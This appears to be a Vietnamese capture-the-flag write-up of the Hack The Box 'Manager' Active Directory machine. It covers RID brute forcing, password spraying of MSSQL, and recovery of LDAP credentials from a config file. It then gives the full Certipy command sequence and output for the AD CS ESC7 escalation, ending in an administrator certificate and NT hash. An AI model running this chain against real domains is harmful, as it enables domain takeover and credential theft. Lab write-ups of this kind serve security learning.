Manager

Enumeration

Zenmap:

Lại thêm một chiếc máy nữa về AD.

CrackMapExec

Liệt kê user sử dụng chức năng bruteforcing RID của CrackMapExec.

Tôi đã có được các user name trên server, tạo một file list các user đặt tên là user.txt. Trước đó tôi biết rằng có dịch vụ mssql đang hoạt động. Thử brute force mssql: Password spraying

Tôi đã có user và password của mssql:

Login và liệt kê các thư mục có sẵn và tôi tìm thấy:

Gaining access Raven

Tôi thấy có một file zip trong thư mục website, tải nó về máy và mở nó Tôi thu được một file cấu hình sau:

<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <server>
      <host>dc01.manager.htb</host>
      <open-port enabled="true">389</open-port>
      <secure-port enabled="false">0</secure-port>
      <search-base>dc=manager,dc=htb</search-base>
      <server-type>microsoft</server-type>
      <access-user>
         <user>raven@manager.htb</user>
         <password>**********************</password>
      </access-user>
      <uid-attribute>cn</uid-attribute>
   </server>
   <search type="full">
      <dir-list>
         <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
      </dir-list>
   </search>
</ldap-conf>

Tôi đã có được user và password login nó:

Privilege escalation

Upload file Certify.exe và kiểm tra lỗ hổng tồn tại, tôi thấy:

Tôi thấy rằng user có quyền ManageCA. Tôi thực hiện khai thác sau: Vulnerable Certificate Authority Access Control - Esc7

Từ đó tôi có khai thác sau:

PS D:\thehackbox\Machines\Manager> certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'PASSWORD'
Certipy v4.5.1 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
PS D:\thehackbox\Machines\Manager> certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'PASSWORD'
Certipy v4.5.1 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
PS D:\thehackbox\Machines\Manager> certipy req -username raven@manager.htb -password 'PASSWORD' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.5.1 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 13
Would you like to save the private key? (y/N) y
[*] Saved private key to 13.key
[-] Failed to request certificate
PS D:\thehackbox\Machines\Manager> certipy ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'PASSWORD'
Certipy v4.5.1 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate
PS D:\thehackbox\Machines\Manager> certipy req -username raven@manager.htb -password 'PASSWORD' -ca 'manager-DC01-CA' -target manager.htb -retrieve 13
Certipy v4.5.1 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 13
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '13.key'
[*] Saved certificate and private key to 'administrator.pfx'
PS D:\thehackbox\Machines\Manager> certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb' -dc-ip <IP Box>
Certipy v4.5.1 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aa****************************ee:ae****************************ef
PS D:\thehackbox\Machines\Manager>

Đã có thông tin đăng nhập administrator, Đăng nhập và lấy cờ.

Thèm bia quá rùi, tui đi uống bia đây goodbye. :D